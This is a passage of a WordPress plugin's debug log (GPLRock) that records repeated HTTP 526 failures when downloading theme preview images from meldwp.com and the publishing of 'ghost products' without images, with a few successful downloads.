HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:23 UTC] GPLRock: Image download failed for product artizani-handmade-artists-and-artisans-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/artizani---handmade-artists-and-artisans-wordpress-theme-17202.webp for product artizani-handmade-artists-and-artisans-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:17:25 UTC] GPLRock WARNING: Image download failed for product artizani-handmade-artists-and-artisans-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/artizani---handmade-artists-and-artisans-wordpress-theme-17202.webp [05-Apr-2026 03:17:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: artizani-handmade-artists-and-artisans-wordpress-theme [05-Apr-2026 03:17:25 UTC] GPLRock: Image download failed for product av-studio-one-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:27 UTC] GPLRock: Image download failed for product av-studio-one-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/av-studio---one-page-wordpress-theme-32557.webp for product av-studio-one-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:17:30 UTC] GPLRock: Image download failed for product av-studio-one-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:32 UTC] GPLRock: Image download failed for product av-studio-one-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/av-studio---one-page-wordpress-theme-32557.webp for product av-studio-one-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:17:34 UTC] GPLRock WARNING: Image download failed for product av-studio-one-page-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/av-studio---one-page-wordpress-theme-32557.webp [05-Apr-2026 03:17:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: av-studio-one-page-wordpress-theme [05-Apr-2026 03:17:34 UTC] GPLRock: Image download failed for product naxly-data-science-analytics-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:36 UTC] GPLRock: Image download failed for product naxly-data-science-analytics-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/naxly---data-science--analytics-wordpress-theme-12283.webp for product naxly-data-science-analytics-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:17:39 UTC] GPLRock: Image download failed for product naxly-data-science-analytics-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:41 UTC] GPLRock: Image download failed for product naxly-data-science-analytics-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/naxly---data-science--analytics-wordpress-theme-12283.webp for product naxly-data-science-analytics-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:17:43 UTC] GPLRock WARNING: Image download failed for product naxly-data-science-analytics-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/naxly---data-science--analytics-wordpress-theme-12283.webp [05-Apr-2026 03:17:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: naxly-data-science-analytics-wordpress-theme [05-Apr-2026 03:17:43 UTC] GPLRock: Image download failed for product okab-responsive-multi-purpose-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:45 UTC] GPLRock: Image download failed for product okab-responsive-multi-purpose-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/okab---responsive-multi-purpose-wordpress-theme--rtl-31291.webp for product okab-responsive-multi-purpose-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:17:47 UTC] GPLRock: Image download failed for product okab-responsive-multi-purpose-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:49 UTC] GPLRock: Image download failed for product okab-responsive-multi-purpose-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/okab---responsive-multi-purpose-wordpress-theme--rtl-31291.webp for product okab-responsive-multi-purpose-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:17:52 UTC] GPLRock WARNING: Image download failed for product okab-responsive-multi-purpose-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/okab---responsive-multi-purpose-wordpress-theme--rtl-31291.webp [05-Apr-2026 03:17:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: okab-responsive-multi-purpose-wordpress-theme-rtl [05-Apr-2026 03:17:52 UTC] GPLRock: Image download failed for product justshoppe-elementor-cake-bakery-food-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:54 UTC] GPLRock: Image download failed for product justshoppe-elementor-cake-bakery-food-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/justshoppe---elementor-cake-bakery--food-wordpress-16430.webp for product justshoppe-elementor-cake-bakery-food-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:17:56 UTC] GPLRock: Image download failed for product justshoppe-elementor-cake-bakery-food-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:17:58 UTC] GPLRock: Image download failed for product justshoppe-elementor-cake-bakery-food-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:18:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/justshoppe---elementor-cake-bakery--food-wordpress-16430.webp for product justshoppe-elementor-cake-bakery-food-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:18:00 UTC] GPLRock WARNING: Image download failed for product justshoppe-elementor-cake-bakery-food-wordpress. URL: https://meldwp.com/wp-content/uploads/justshoppe---elementor-cake-bakery--food-wordpress-16430.webp [05-Apr-2026 03:18:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: justshoppe-elementor-cake-bakery-food-wordpress [05-Apr-2026 03:18:21 UTC] GPLRock: Image download failed for product furniki-furniture-store-interior-design-wordpress-woocommerce-theme-mobile-layout-ready (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:18:23 UTC] GPLRock: Image download failed for product furniki-furniture-store-interior-design-wordpress-woocommerce-theme-mobile-layout-ready (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:18:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/furniki---furniture-store--interior-design-wordpress-woocommerce-theme-mobile-la-3382.webp for product furniki-furniture-store-interior-design-wordpress-woocommerce-theme-mobile-layout-ready after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:18:25 UTC] GPLRock: Image download failed for product furniki-furniture-store-interior-design-wordpress-woocommerce-theme-mobile-layout-ready (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:18:28 UTC] GPLRock: Image download failed for product furniki-furniture-store-interior-design-wordpress-woocommerce-theme-mobile-layout-ready (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:18:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/furniki---furniture-store--interior-design-wordpress-woocommerce-theme-mobile-la-3382.webp for product furniki-furniture-store-interior-design-wordpress-woocommerce-theme-mobile-layout-ready after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:18:30 UTC] GPLRock WARNING: Image download failed for product furniki-furniture-store-interior-design-wordpress-woocommerce-theme-mobile-layout-ready. URL: https://meldwp.com/wp-content/uploads/furniki---furniture-store--interior-design-wordpress-woocommerce-theme-mobile-la-3382.webp [05-Apr-2026 03:18:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: furniki-furniture-store-interior-design-wordpress-woocommerce-theme-mobile-layout-ready [05-Apr-2026 03:18:30 UTC] GPLRock: Image download failed for product quardo-deluxe-hotels-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:18:32 UTC] GPLRock: Image download failed for product quardo-deluxe-hotels-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:18:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quardo--deluxe-hotels-wordpress-theme-25674.webp for product quardo-deluxe-hotels-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:18:34 UTC] GPLRock: Image download failed for product quardo-deluxe-hotels-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:18:36 UTC] GPLRock: Image download failed for product quardo-deluxe-hotels-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:18:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quardo--deluxe-hotels-wordpress-theme-25674.webp for product quardo-deluxe-hotels-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:18:38 UTC] GPLRock WARNING: Image download failed for product quardo-deluxe-hotels-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/quardo--deluxe-hotels-wordpress-theme-25674.webp [05-Apr-2026 03:18:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: quardo-deluxe-hotels-wordpress-theme [05-Apr-2026 03:18:38 UTC] GPLRock: Image download failed for product hotelzo-luxury-hotel-wordpress-theme-rtl-ready (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:18:41 UTC] GPLRock: Image download failed for product hotelzo-luxury-hotel-wordpress-theme-rtl-ready (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:18:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hotelzo---luxury-hotel-wordpress-theme--rtl-ready-9775.webp for product hotelzo-luxury-hotel-wordpress-theme-rtl-ready after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:18:43 UTC] GPLRock: Image download failed for product hotelzo-luxury-hotel-wordpress-theme-rtl-ready (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:18:45 UTC] GPLRock: Image download failed for product hotelzo-luxury-hotel-wordpress-theme-rtl-ready (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:18:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hotelzo---luxury-hotel-wordpress-theme--rtl-ready-9775.webp for product hotelzo-luxury-hotel-wordpress-theme-rtl-ready after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:18:47 UTC] GPLRock WARNING: Image download failed for product hotelzo-luxury-hotel-wordpress-theme-rtl-ready. URL: https://meldwp.com/wp-content/uploads/hotelzo---luxury-hotel-wordpress-theme--rtl-ready-9775.webp [05-Apr-2026 03:18:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hotelzo-luxury-hotel-wordpress-theme-rtl-ready [05-Apr-2026 03:18:47 UTC] GPLRock: Image download failed for product vestry-church (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:18:49 UTC] GPLRock: Image download failed for product vestry-church (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:18:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vestry---church-11009.webp for product vestry-church after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:18:51 UTC] GPLRock: Image download failed for product vestry-church (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:18:53 UTC] GPLRock: Image download failed for product vestry-church (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:18:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vestry---church-11009.webp for product vestry-church after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:18:56 UTC] GPLRock WARNING: Image download failed for product vestry-church. URL: https://meldwp.com/wp-content/uploads/vestry---church-11009.webp [05-Apr-2026 03:18:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vestry-church [05-Apr-2026 03:18:56 UTC] GPLRock: Image download failed for product ayo-responsive-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:18:58 UTC] GPLRock: Image download failed for product ayo-responsive-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:19:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ayo---responsive-elementor-woocommerce-theme-25103.webp for product ayo-responsive-elementor-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:19:00 UTC] GPLRock: Image download failed for product ayo-responsive-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:19:02 UTC] GPLRock: Image download failed for product ayo-responsive-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:19:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ayo---responsive-elementor-woocommerce-theme-25103.webp for product ayo-responsive-elementor-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:19:04 UTC] GPLRock WARNING: Image download failed for product ayo-responsive-elementor-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/ayo---responsive-elementor-woocommerce-theme-25103.webp [05-Apr-2026 03:19:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ayo-responsive-elementor-woocommerce-theme [05-Apr-2026 03:19:04 UTC] GPLRock: Image download failed for product anno-one-page-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:19:06 UTC] GPLRock: Image download failed for product anno-one-page-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:19:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/anno---one-page-portfolio-wordpress-theme-6286.webp for product anno-one-page-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:19:09 UTC] GPLRock: Image download failed for product anno-one-page-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:19:11 UTC] GPLRock: Image download failed for product anno-one-page-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:19:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/anno---one-page-portfolio-wordpress-theme-6286.webp for product anno-one-page-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:19:13 UTC] GPLRock WARNING: Image download failed for product anno-one-page-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/anno---one-page-portfolio-wordpress-theme-6286.webp [05-Apr-2026 03:19:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: anno-one-page-portfolio-wordpress-theme [05-Apr-2026 03:19:13 UTC] GPLRock: Image download failed for product beauty-center-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:19:15 UTC] GPLRock: Image download failed for product beauty-center-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:19:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/beauty-center---responsive-wordpress-theme-5638.webp for product beauty-center-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:19:17 UTC] GPLRock: Image download failed for product beauty-center-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:19:19 UTC] GPLRock: Image download failed for product beauty-center-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:19:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/beauty-center---responsive-wordpress-theme-5638.webp for product beauty-center-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:19:21 UTC] GPLRock WARNING: Image download failed for product beauty-center-responsive-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/beauty-center---responsive-wordpress-theme-5638.webp [05-Apr-2026 03:19:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: beauty-center-responsive-wordpress-theme [05-Apr-2026 03:19:22 UTC] GPLRock: Image download failed for product oriobook-book-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:19:24 UTC] GPLRock: Image download failed for product oriobook-book-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:19:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oriobook--book-store-woocommerce-wordpress-theme-24379.webp for product oriobook-book-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:19:26 UTC] GPLRock: Image download failed for product oriobook-book-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:19:28 UTC] GPLRock: Image download failed for product oriobook-book-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:19:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/oriobook--book-store-woocommerce-wordpress-theme-24379.webp for product oriobook-book-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:19:30 UTC] GPLRock WARNING: Image download failed for product oriobook-book-store-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/oriobook--book-store-woocommerce-wordpress-theme-24379.webp [05-Apr-2026 03:19:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: oriobook-book-store-woocommerce-wordpress-theme [05-Apr-2026 03:19:30 UTC] GPLRock: Image downloaded successfully for product zosia-personal-wordpress-blog-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-13bd2a4f.webp [05-Apr-2026 03:19:30 UTC] GPLRock: Using pre-downloaded image for product zosia-personal-wordpress-blog-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-13bd2a4f.webp [05-Apr-2026 03:19:30 UTC] GPLRock: Ghost product published with image - Product ID: zosia-personal-wordpress-blog-theme [05-Apr-2026 03:19:30 UTC] GPLRock: Image downloaded successfully for product medicenter-health-medical-template (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0f181818.webp [05-Apr-2026 03:19:30 UTC] GPLRock: Using pre-downloaded image for product medicenter-health-medical-template: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0f181818.webp [05-Apr-2026 03:19:30 UTC] GPLRock: Ghost product published with image - Product ID: medicenter-health-medical-template [05-Apr-2026 03:19:46 UTC] GPLRock: Image download failed for product proauto-car-detailing-service-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:19:48 UTC] GPLRock: Image download failed for product proauto-car-detailing-service-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:19:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/proauto---car-detailing-service--shop-wordpress-theme-27206.webp for product proauto-car-detailing-service-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:19:50 UTC] GPLRock: Image download failed for product proauto-car-detailing-service-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:19:52 UTC] GPLRock: Image download failed for product proauto-car-detailing-service-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:19:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/proauto---car-detailing-service--shop-wordpress-theme-27206.webp for product proauto-car-detailing-service-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:19:54 UTC] GPLRock WARNING: Image download failed for product proauto-car-detailing-service-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/proauto---car-detailing-service--shop-wordpress-theme-27206.webp [05-Apr-2026 03:19:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: proauto-car-detailing-service-shop-wordpress-theme [05-Apr-2026 03:19:54 UTC] GPLRock: Image download failed for product educrat-online-course-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:19:57 UTC] GPLRock: Image download failed for product educrat-online-course-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:19:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/educrat---online-course-education-wordpress-theme-27502.webp for product educrat-online-course-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:19:59 UTC] GPLRock: Image download failed for product educrat-online-course-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:01 UTC] GPLRock: Image download failed for product educrat-online-course-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/educrat---online-course-education-wordpress-theme-27502.webp for product educrat-online-course-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:20:03 UTC] GPLRock WARNING: Image download failed for product educrat-online-course-education-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/educrat---online-course-education-wordpress-theme-27502.webp [05-Apr-2026 03:20:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: educrat-online-course-education-wordpress-theme [05-Apr-2026 03:20:03 UTC] GPLRock: Image download failed for product beautyspot-beauty-salon-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:05 UTC] GPLRock: Image download failed for product beautyspot-beauty-salon-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/beautyspot---beauty-salon-wordpress-theme-20569.webp for product beautyspot-beauty-salon-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:20:07 UTC] GPLRock: Image download failed for product beautyspot-beauty-salon-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:09 UTC] GPLRock: Image download failed for product beautyspot-beauty-salon-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/beautyspot---beauty-salon-wordpress-theme-20569.webp for product beautyspot-beauty-salon-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:20:11 UTC] GPLRock WARNING: Image download failed for product beautyspot-beauty-salon-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/beautyspot---beauty-salon-wordpress-theme-20569.webp [05-Apr-2026 03:20:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: beautyspot-beauty-salon-wordpress-theme [05-Apr-2026 03:20:12 UTC] GPLRock: Image download failed for product eventr-one-page-event-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:14 UTC] GPLRock: Image download failed for product eventr-one-page-event-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eventr---one-page-event-wordpress-theme-31723.webp for product eventr-one-page-event-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:20:16 UTC] GPLRock: Image download failed for product eventr-one-page-event-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:18 UTC] GPLRock: Image download failed for product eventr-one-page-event-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eventr---one-page-event-wordpress-theme-31723.webp for product eventr-one-page-event-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:20:20 UTC] GPLRock WARNING: Image download failed for product eventr-one-page-event-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/eventr---one-page-event-wordpress-theme-31723.webp [05-Apr-2026 03:20:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: eventr-one-page-event-wordpress-theme [05-Apr-2026 03:20:20 UTC] GPLRock: Image download failed for product ehauzon-property-listing-for-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:22 UTC] GPLRock: Image download failed for product ehauzon-property-listing-for-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ehauzon---property-listing-for-wordpress-theme-1044.webp for product ehauzon-property-listing-for-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:20:25 UTC] GPLRock: Image download failed for product ehauzon-property-listing-for-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:27 UTC] GPLRock: Image download failed for product ehauzon-property-listing-for-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ehauzon---property-listing-for-wordpress-theme-1044.webp for product ehauzon-property-listing-for-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:20:29 UTC] GPLRock WARNING: Image download failed for product ehauzon-property-listing-for-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ehauzon---property-listing-for-wordpress-theme-1044.webp [05-Apr-2026 03:20:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ehauzon-property-listing-for-wordpress-theme [05-Apr-2026 03:20:29 UTC] GPLRock: Image download failed for product rdest-creative-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:31 UTC] GPLRock: Image download failed for product rdest-creative-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rdest---creative-elementor-wordpress-theme-27022.webp for product rdest-creative-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:20:33 UTC] GPLRock: Image download failed for product rdest-creative-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:36 UTC] GPLRock: Image download failed for product rdest-creative-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rdest---creative-elementor-wordpress-theme-27022.webp for product rdest-creative-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:20:38 UTC] GPLRock WARNING: Image download failed for product rdest-creative-elementor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/rdest---creative-elementor-wordpress-theme-27022.webp [05-Apr-2026 03:20:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rdest-creative-elementor-wordpress-theme [05-Apr-2026 03:20:38 UTC] GPLRock: Image download failed for product gabo-minimalist-full-screen-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:40 UTC] GPLRock: Image download failed for product gabo-minimalist-full-screen-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gabo---minimalist--full-screen-wordpress-theme-2402.webp for product gabo-minimalist-full-screen-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:20:42 UTC] GPLRock: Image download failed for product gabo-minimalist-full-screen-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:44 UTC] GPLRock: Image download failed for product gabo-minimalist-full-screen-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 03:20:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gabo---minimalist--full-screen-wordpress-theme-2402.webp for product gabo-minimalist-full-screen-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 03:20:46 UTC] GPLRock WARNING: Image download failed for product 